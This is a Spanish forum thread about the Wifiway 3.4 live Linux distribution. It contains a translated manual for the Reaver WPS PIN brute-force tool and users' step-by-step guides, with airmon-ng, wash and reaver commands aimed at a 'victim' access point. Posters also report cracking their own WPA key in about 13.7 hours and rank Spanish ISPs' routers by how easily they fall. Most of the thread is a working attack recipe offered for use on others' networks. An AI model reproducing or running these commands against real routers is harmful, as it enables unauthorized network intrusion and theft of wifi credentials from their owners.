Nos obligan a molestarte con la obviedad de que este sitio usa cookies OK | Más información
qviart

Chincheta Autor Tema: Liberado wifiway-3.4 nuevo  (Leído 93987 veces)

24/01/2012, 09:22

Desconectado meca2123

messageicon

Liberado wifiway-3.4 nuevo

« en: 24/01/2012, 09:22 »
  • Publish
  • Esto lo he encontrado en otro foro. y dicen que va muy bien, a ver si luego puedo poner la direccion de descarga

    Liberado wifiway-3.4 nuevo
    Bueno , pues despues de un par de semanas de salir wifiway 3.0 , lanzamos esta version 3.4 con arreglos varios y añadidos interesantes como la aplicacion de moda actualmente ( reaver wps ).

    Es una masterizacion de wifiway 3.0 con la mayoria de problemas solventados, o al menos los de categoria “critica o grave” …como los problemas de booteo.

    la lista de cambios no es muy extensa ,pero si interesante.

    Código:
    Reconstruido modulo nvidia por conflico con intel 3945
    Actualizado hashcat a version 007
    Actualizado aircrack-ng a version 1.1 revision 2022
    Añadido cheat max_loop=255 en las opciones de arranque
    Añadido reaver 1.4
    Añadido salvar sesion reaver
    Añadido walsh
    Solventados los problemas de booteo
    Modificado script lilo y alguno mas apuntando a initrd.xz y no a initrd.gz que ya no se usa.
    Eliminadas algunas paginas guardadas en firefox
    Cambiado script make_iso por el del equipo de desarrollo
    Cambiado dir2xzm por tener una version vieja
    Eliminado sonido de bienvenida
    En esta ocasion tengo que dar gracias a mas gente , cosa que me alegra, por que significa que hay gente que es capaz de colaborar de la manera que pueda , como nosotros ..en sus ratos libres, sin ningun tipo de ineteres y que por aqui no solo hay gente inetersada en REVENTAR WIFIS AJENAS.

    A lo cual aprovecho recordar NO DAMOS SOPORTE Y NO ES NUESTRA FILOSOFIA , solo compartimos inquetudes desinteresadamente.


    y de aqui os lo podeis descargar:
    No tienes permiso para ver los enlaces. Regístrate o Autentícate
    « Última modificación: 24/01/2012, 12:11 por meca2123 »



    15/02/2012, 23:10Respuesta #1

    Conectado raul7

    messageicon

    Re: Liberado wifiway-3.4 nuevo

    « Respuesta #1 en: 15/02/2012, 23:10 »
  • Publish
  • Manual castellano reaverFuente original

    No tienes permiso para ver los enlaces. Regístrate o Autentícate

    Autor traduccion: gpain

    Zona de Descarga

    No tienes permiso para ver los enlaces. Regístrate o Autentícate

    Ultima version

    No tienes permiso para ver los enlaces. Regístrate o Autentícate
    SHA1 Checksum:    408a4d4cd5051d290a68c140d3351acbf32dc4a 7

    Incluido en wifiway 3.4, unica live del mundo que lo incorpora de serie
    DESCARGA OFICIAL: No tienes permiso para ver los enlaces. Regístrate o Autentícate
    MD5: 3e0645da12d5bbbdb4dd335c891e2866

    Observaciones
    Puedes copiar este manual en todos los sitios que deseis, solo pedimos que por favor
    mantengais el autor de la traduccion gpain

    Resumen

    Reaver lleva a cabo un ataque de fuerza bruta contra el número pin de la configuración protegida del punto de acceso wifi. Una vez que el pin WPS es encontrado, la WPA PSK puede ser recuperada y alternativamente la configuración inalámbrica del AP puede ser reconfigurada.

    Aunque reaver no soporta la reconfiguración del AP, se puede conseguir con el wpa_supplicant una vez el pin WPS es conocido.

    DESCRIPCIÓN

    Reaver tiene como objectivo la funcionalidad externa de “registrador” requerida por la especificación de configuración inalámbrica protegida. Los puntos de acceso proveerán “registradores” autenticados con su configuración inalámbrica actual (incluyendo la WPA PSK), y también aceptaran una nueva configuración del registro.

    Con el fin de autenticarse como “registrador”, el “registrador” debe probar su conocimiento del número pin de 8 dígitos del AP. Los “registradores” deberían autenticarse a sí mismos al AP sin importar cuando sin la interacción del usuario.

    A causa de que el protocolo WPS es conducido sobre EAP, el “registrador” sólo necesita estar asociado con el AP y ningún conocimiento previo del cifrado inalámbrico o de la configuración.

    Reaver lleva acabo un ataque de fuerza bruta contra el AP, probando cada posible combinación para adivinar el número pin de 8 dígitos del AP. Desde que los números pin son entéramente numéricos, hay 10^8 (100.000.000) posibles valores para cualquier número pin. Sin embargo, como el último dígito del pin es un valor checksum (de comprobación) que puede ser calculado en base a los 7 dígitos previos, la posibles claves son reducidas a 10^7 (10,000,000) valores posibles.

    Las posibles llaves son reducidas incluso más debido al hecho de que el protocolo de autentificación WPS corta el pin por la mitad y valida cada mitad individualmente. Eso significa que hay 10^4 (10.000) posibles valores para la primera mitad del pin y 10^3 (1.000) posibles valores para la segunda mitad del pin, contando el último dígito de comprobación del pin.

    Reaver hace fuerza bruta a la primera mitad del pin y luego a la segunda mitad, provocando que todos los posibles valores del número pin del WPS puedan ser puedan ser agotados en 11.000 intentos. La velocidad a la que Reaver puede probar los números pin está totalmente limitada por la velocidad a la que el AP puede procesar peticiones WPS. Algunos APs son suficientemente rápidos para que se pueda probar un pin cada segundo; otros son mas lentos y solo permiten un pin cada 10 segundos. Estadísticamente, sólo llevara la mitad del tiempo adivinar el número pin correcto.

    INSTALACIÓN

    Reaver sólo está soportado en la plataforma linux, requiere las librerias libpcap y libsqlite3, y puede ser construido e instalado ejecutando:

    Código:
                    $ ./configure
                    $ make
                    # make installPara desinstalar todo lo instalado/creado por Reaver:

    Código:
        # make distcleanUSO

    Habitualmente, el único argumento requerido para Reaver es el nombre de la interfaz y el BSSID del AP objetivo:

    Código:
    # reaver -i mon0 -b 00:01:02:03:04:05El canal y SSID (teniendo en cuenta que el SSID no esta encubierto) del AP objetivo son identificados automáticamente por Reaver, a menos que se especifique explícitamente en la línea de comando:

    Código:
    # reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksysPor defecto, si el AP cambia canales, Reaver también cambiará su canal en consecuencia. Sin embargo, está característica puede ser desactivada “fijando” el canal de la interfaz.

    Código:
     # reaver -i mon0 -b 00:01:02:03:04:05 --fixedEl tiempo de espera de recepción por defecto es 5 segundos. Este tiempo de espera puede ser configurado manualmente si fuera necesario (el tiempo de espera mínimo es 1 segundo):

    Código:
     # reaver -i mon0 -b 00:01:02:03:04:05 -t 2El tiempo de retraso por defecto entre intentos de pin es de 1 segundo. Este valor puede ser incrementado o decrementado a cualquiera valor entero no negativo. Un valor de cero significa sin retraso:

    Código:
    # reaver -i mon0 -b 00:01:02:03:04:05 -d 0Algunos APs bloquearán temporálmente su estado WPS, normalmente durante 5 minutos o menos, cuando es detectada actividad “sospechosa”. Por defecto cuando se detecta un estado bloqueado, Reaver comprobará el estado cada 315 segundos (5 minutos y 15 segundos) y no continuará haciendo fuerza bruta a los pins hasta que el estado del WPS esté desbloqueado. Esta comprobación puede ser incrementada o decrementada a cualquier valor entero no negativo:

    Código:
     # reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250Para salidas adicionales, se debe proporcionar la opción “verbose”. Proporcionando la opción “verbose” dos veces se incrementará el nivel de detalle y se mostrará cada número pin intentado.

    Código:
    # reaver -i mon0 -b 00:01:02:03:04:05 -vvEl tiempo de espera por defecto para recibir los mensajes de respuesta del WPS M5 y M7 es .1 segundos. Este tiempo de espera puede ser fijado manualmente si fuese necesario (tiempo de espera máximo 1 segundo).

    Código:
     # reaver -i mon0 -b 00:01:02:03:04:05 -T .5Algunas implementaciones WPS pobres tirarán la conexión, cuando se suministre un pin inválido en vez de responder con un mensaje NACK como dicen las especificaciones. Teniendo en cuenta esto, si se alcanza el tiempo de espera de mensaje M5/M7, es tratado por defecto como un NACK. Sin embargo, si se sabe que el AP envía NACKS (la mayoría lo hacen), esta característica puede ser desactivada para mayor exactitud. Esta opción está ampliamente en desuso ya que Reaver autodetectará si un AP responde adecuadamente con NACKs o no:

    Código:
     # reaver -i mon0 -b 00:01:02:03:04:05 --nackAunque a la mayoría de los APs no les importa, enviar un mensaje EAP FAIL para cerrar una sesión WPA es necesario a veces. Por defecto esta característica esta deshabilitada, pero puede habilitarse para aquellos APs que la necesiten.

    Código:
     # reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminateCuando se encuentran 10 errores WPS consecutivos no esperados, se mostrará un mensaje de advertencia. Cómo esto es una señal de que el AP está limitado el ratio de intentos del pin o simplemente siendo desbordado, se fijará una pausa cuando aparezcan estos mensajes:

    Código:
     # reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360ARCHIVOS

    Lo siguiente son archivos fuente de Reaver:

    80211.c Funciones para leer, enviar y analizar trazas de gestión 802.11
    builder.c Funciones para construir paquetes y paquetes de encabezado
    config.h Generado por el script de configuración
    cracker.c Funciones principales de crackeo para Reaver.
    defs.h Encabezados comunes con la mayoría de las declaraciones y definiciones requeridas.
    exchange.c Funciones para iniciar y procesar el intercambio WPS.
    globule.c Funciones de contenedor para acceder a los ajustes globales.
    iface.c Funciones de la interfaz de red.
    init.c Funciones de inicialización.
    keys.c Contiene tablas de todos los posibles pins.
    misc.c Conversión de direcciones mac, funciones de depurado, etc
    pins.c Generación de Pin y funcione de aleatoreidad.
    send.c Funciones para enviar mensajes de respuesta WPS
    sigalrm.c Funciones para el manejo de interrupciones SIGALRM
    sigint.c Funciones para el manejo de interrupciones SIGINT
    wpscrack.c Principal archivo fuente de Reaver
    wps.h Incluye funciones para wpa_supplicant
    libwps/ Generic Librería para analizar los elementos de información WPS

    Los siguientes archivos han sido cogidos de wpa_supplicant. Algunos han sido modificados a partir de sus originales.

    common/
    crypto/
    tls/
    utils/
    wps/

    El directorio Iew contiene la version 29 de Wireless Tools, usada para interactuar con las extensiones inalámbricas de Linux.

    19/02/2012, 18:54Respuesta #2

    Conectado raul7

    messageicon

    Re: Liberado wifiway-3.4 nuevo

    « Respuesta #2 en: 19/02/2012, 18:54 »
  • Publish
  • modulo de reaver 1.4 final--actualizado

    se descarga, se mete en la carpeta base o modules de wifiway 3.4 y se inicia wifiway,,yo utilizo pendray booteado

    y el comando del walsh para detectar aps vulnerables (con wps activo)ahora es:

    wash -i mon0 -C


    20/02/2012, 12:34Respuesta #3

    Conectado raul7

    messageicon
    Re: Liberado wifiway-3.4 nuevo
    « Respuesta #3 en: 20/02/2012, 12:34 »
  • Publish
  • pues si,sin diccionarios

    mi clave de ono,codificada en WPA-PSK ,con wps activo

    sacada en 13.7 horas(49427 sg)

    ONO****

    con reaver actualizado,wifiway 3.4
    y antena alfa 1w AWUSO

    saludos
    « Última modificación: 20/02/2012, 13:10 por raul7 »

    27/02/2012, 12:39Respuesta #4

    Desconectado julioli8

    • Usuario de los más grande
    • *****
    • Gracias
    • -Dada: 7
    • -Recibida: 51
    • Mensajes: 729
    messageicon
    Re: Liberado wifiway-3.4 nuevo
    « Respuesta #4 en: 27/02/2012, 12:39 »
  • Publish
  • porque no meten ese reaver al disco iso.
    yo abro la iso wifiway. meto la carpeta, pero despues no me deja grabarlo denuevo., o como lo haces?

    27/02/2012, 21:21Respuesta #5

    Conectado raul7

    messageicon
    Re: Liberado wifiway-3.4 nuevo
    « Respuesta #5 en: 27/02/2012, 21:21 »
  • Publish
  • No tienes permiso para ver los enlaces. Regístrate o Autentícate
    porque no meten ese reaver al disco iso.
    yo abro la iso wifiway. meto la carpeta, pero despues no me deja grabarlo denuevo., o como lo haces?

    yo uso pendray booteado y lo meto en carpeta modulos o bases

    desde cd,tambien puedes hacerlo,,mete ese fichero en un pendray y cuando  arranques wifiway,arriba a izquierda
    sale dispositivos estraibles,selecciona pendray y te llevas ese fichero(reaver 1,4 ) al escritorio y lo ejecutas alli

    asi lo tendras cargado en esa sesion

    saludos

    27/02/2012, 21:40Respuesta #6

    Conectado raul7

    messageicon
    Re: Liberado wifiway-3.4 nuevo
    « Respuesta #6 en: 27/02/2012, 21:40 »
  • Publish
  • cuando la cosa esta bien,asi saldra la pantalla del reaver,hasta llegar al 100%

    todo positivos(+) al comienzo de linea,en red con wps activo


    Liberado wifiway-3.4 nuevo-http://i41.tinypic.com/2u4rp1t.png

    28/02/2012, 00:08Respuesta #7

    Conectado raul7

    messageicon
    Re: Liberado wifiway-3.4 nuevo
    « Respuesta #7 en: 28/02/2012, 00:08 »
  • Publish
  • Rizando el rizo,,genial

    MODULO: WPSCRACKGUI-1.0.9
    DESCRIPCION: interfaz grafica para reaver y wash , ademas incluye algunas opciones extra.
    COMPATIBILIDAD: wifiway 3.4
    DESCARGA: No tienes permiso para ver los enlaces. Regístrate o Autentícate
    by USUARIONUEVO


    Liberado wifiway-3.4 nuevo-http://i44.tinypic.com/xb0509.png

    28/02/2012, 21:18Respuesta #8

    Conectado raul7

    messageicon
    Re: Liberado wifiway-3.4 nuevo
    « Respuesta #8 en: 28/02/2012, 21:18 »
  • Publish
  • escaneo de redes con wps activo
    Liberado wifiway-3.4 nuevo-http://i43.tinypic.com/au8m5h.png

    clave wpa,auditada con reaver 1.4,,en wifiway 3.4

    Liberado wifiway-3.4 nuevo-http://i44.tinypic.com/2vl19qg.png
    « Última modificación: 28/02/2012, 21:26 por raul7 »

    04/03/2012, 22:31Respuesta #9

    Conectado raul7

    messageicon
    Re: Liberado wifiway-3.4 nuevo
    « Respuesta #9 en: 04/03/2012, 22:31 »
  • Publish
  • Guardar sesion usando wifiway en cd :

    mete un pendray a deco,,y cuando vayas a cerrar reaver,,hay una opcion debajo del reaver,,q pone guardar sesion,le das antes de cerrar reaver y te crea en escritorio un archivo.xzm
    llevatelo de alli a pendray ,con el icono q sale en wifiway arriba a izquierda(dispositivos estraibles)
    la proxima vez q vayas a abrir reaver,traete otra vez ese archivo al escritorio y selecciona   la misma red con reaver

    asi puedes tener varias redes preparadas y a medias,almacenadas en pendray


    lo suyo es usar wifiway en pendray booteado,asi se hace
    No tienes permiso para ver los enlaces. Regístrate o Autentícate
    « Última modificación: 04/03/2012, 22:43 por raul7 »

    06/03/2012, 22:00Respuesta #10

    Conectado raul7

    messageicon
    Re: Liberado wifiway-3.4 nuevo
    « Respuesta #10 en: 06/03/2012, 22:00 »
  • Publish
  • Un pequeño manual ,testado por mi

    1-poner en modo monitor
    inicio/wifiway/suite aircrack-ng/airmon-ng(start modo monitor)
    wlan0/aplicar
    cerramos esas ventanas y ya la tenemos en mon0

    2-buscamos objetivos con wps activo
    inicio/wifiway/wpa wps/buscar objetivos con wps activado(walsh)
    escribimos en esa consola
    walsh -i mon0 -C
    apuntamos los datos de nuestra victima:bbsid(mac) essid(nombre) y canal
    cerramos esa consola

    3-atacar protocolo WPS con reaver
    inicio/wifiway/wpa wps/atacar protocolo WPS ( reaver)
    alli escribimos
    reaver -i mon0 -b (mac de la victima) -a -c (canal de la victima) -e (nombre de la victima) -d 5 -w -N -vv

    o esta
    reaver -i mon0 -b (mac de la victima) -c (canal de la victima) -vv --no-nack -d 5

    o esta
    reaver -i mon0 -b (mac de la victima) -c (canal de la victima)

    y pulsamos enter


    4-esperar  al 100%
    suele tardar una media de 12 horas
    ********************************************************************************************************
    Guardar ataque
    desde WifiWay 3.4 y reaver 1.4, cuando salvas avance en XZM , lo deberia de crear en el escritorio.
    Luego ese archivo lo haz de introducir en la carpeta de wifiway en base o modules.
    y cuando quieras atacar de nuevo a esa red,,lo pones en escritorio,de nuevo

    espero q os sirva

    testado con antena alfa 1w awuso
    « Última modificación: 11/03/2012, 17:49 por raul7 »

    11/03/2012, 12:27Respuesta #11

    Desconectado ciruselvirus

    messageicon
    Re: Liberado wifiway-3.4 nuevo
    « Respuesta #11 en: 11/03/2012, 12:27 »
  • Publish
  • 3-atacar protocolo WPS con reaver
    inicio/wifiway/wpa wps/atacar protocolo WPS ( reaver)
    alli escribimos
    reaver -i mon0 -b (mac de la victima)  -a -c (canal de la victima) -e (nombre de la victima) -d 5 -w -N  -vv

    o esta
    reaver -i mon0 -b (mac de la victima)  -c (canal de la victima) -vv --no-nack -d 5

    o esta
    reaver -i mon0 -b (mac de la victima)  -c (canal de la victima)

    4-esperar  al 100%
    suele tardar una media de 12 horas
    hola raul7 despues de escribir una de estas lineas ay que dar a enter es que aki me e perdido un poco, un saaludo

    11/03/2012, 15:57Respuesta #12

    Conectado dsr2001

    messageicon
    Re: Liberado wifiway-3.4 nuevo
    « Respuesta #12 en: 11/03/2012, 15:57 »
  • Publish
  • No tienes permiso para ver los enlaces. Regístrate o Autentícate
    3-atacar protocolo WPS con reaver
    inicio/wifiway/wpa wps/atacar protocolo WPS ( reaver)
    alli escribimos
    reaver -i mon0 -b (mac de la victima)  -a -c (canal de la victima) -e (nombre de la victima) -d 5 -w -N  -vv

    o esta
    reaver -i mon0 -b (mac de la victima)  -c (canal de la victima) -vv --no-nack -d 5

    o esta
    reaver -i mon0 -b (mac de la victima)  -c (canal de la victima)

    4-esperar  al 100%
    suele tardar una media de 12 horas
    hola raul7 despues de escribir una de estas lineas ay que dar a enter es que aki me e perdido un poco, un saaludo

    Debes instalar el reaver que esta en un post mas abajo puesto por Raul, y si cuando tengas la linea pulsa enter ( no todos los objetivos que has localizado, se pueden atacar, no se el motivo pero es así), a ver si Raul nos explica con mas detalle y porque solo toma objetivos de formato WLAN-XXXX.

    Raul, Rizando el rizo,,genial, Si es posible alguna aclaración sobre el manejo de WPSCRACKGUI-1.0.9
    « Última modificación: 11/03/2012, 16:07 por dsr2001 »

    11/03/2012, 17:46Respuesta #13

    Conectado raul7

    messageicon
    Re: Liberado wifiway-3.4 nuevo
    « Respuesta #13 en: 11/03/2012, 17:46 »
  • Publish
  • No tienes permiso para ver los enlaces. Regístrate o Autentícate
    Debes instalar el reaver que esta en un post mas abajo puesto por Raul, y si cuando tengas la linea pulsa enter ( no todos los objetivos que has localizado, se pueden atacar, no se el motivo pero es así), a ver si Raul nos explica con mas detalle y porque solo toma objetivos de formato WLAN-XXXX.
    Raul, Rizando el rizo,,genial, Si es posible alguna aclaración sobre el manejo de WPSCRACKGUI-1.0.9

    el WPSCRACKGUI-1.0.9,,lo use 2 veces y no me gusto,no te deja usar algunos comandos del tipo:-d 5 -w -N  -vv

    prefiero el reaver1.4,,directo
    escaneo redes con wps activo y la q mas señal tenga,la elijo(ojo ,es la q el pwr este mas bajo)

    las de orange se desactiva el wps y ya no te deja seguir.
    las wlan,normalmente salen rapido con el wpa_key(herramienta disponible en wifiway 3.4).
    las de ONO son las q mejor resultado me dan,junto con las q llevan nombre.
    vodafone,todavia no he probado ninguna.
    me refiero a las codificadas en wpa,,las wep salen todas con otras herramientas del ww3.4(wifiway3.4)
    saludos

    12/03/2012, 20:59Respuesta #14

    Conectado dsr2001

    messageicon
    Re: Liberado wifiway-3.4 nuevo
    « Respuesta #14 en: 12/03/2012, 20:59 »
  • Publish
  • No tienes permiso para ver los enlaces. Regístrate o Autentícate
    el WPSCRACKGUI-1.0.9,,lo use 2 veces y no me gusto,no te deja usar algunos comandos del tipo:-d 5 -w -N  -vv

    prefiero el reaver1.4,,directo
    escaneo redes con wps activo y la q mas señal tenga,la elijo(ojo ,es la q el pwr este mas bajo)

    las de orange se desactiva el wps y ya no te deja seguir.
    las wlan,normalmente salen rapido con el wpa_key(herramienta disponible en wifiway 3.4).
    las de ONO son las q mejor resultado me dan,junto con las q llevan nombre.
    vodafone,todavia no he probado ninguna.
    me refiero a las codificadas en wpa,,las wep salen todas con otras herramientas del ww3.4(wifiway3.4)
    saludos

    Gracias Raul, seguiremos investigando.

     

    GoogleTagged



    Related Topics

      Asunto / Iniciado por Respuestas Último mensaje
    normal_post * 0 Respuestas
    1854 Vistas
    Último mensaje 02/01/2009, 14:34
    por josagi
    normal_post * 12 Respuestas
    58496 Vistas
    Último mensaje 30/03/2011, 17:16
    por suministros
    normal_post * 0 Respuestas
    794 Vistas
    Último mensaje 18/05/2011, 02:38
    por w1w
    normal_post * 6 Respuestas
    9514 Vistas
    Último mensaje 28/06/2011, 21:43
    por jaret
    normal_post_sticky * 6 Respuestas
    18084 Vistas
    Último mensaje 22/12/2012, 12:51
    por aljoalru
    hot_post * 16 Respuestas
    21835 Vistas
    Último mensaje 26/11/2012, 10:32
    por dlcc14
    normal_post * 8 Respuestas
    14136 Vistas
    Último mensaje 10/10/2011, 19:23
    por jaret
    normal_post * 2 Respuestas
    9706 Vistas
    Último mensaje 08/12/2011, 12:36
    por simecai
    normal_post * 12 Respuestas
    11551 Vistas
    Último mensaje 14/01/2012, 19:16
    por thefixsenior
    normal_post * 0 Respuestas
    423 Vistas
    Último mensaje 03/02/2012, 18:17
    por otroatletico



    PadreDeFamilia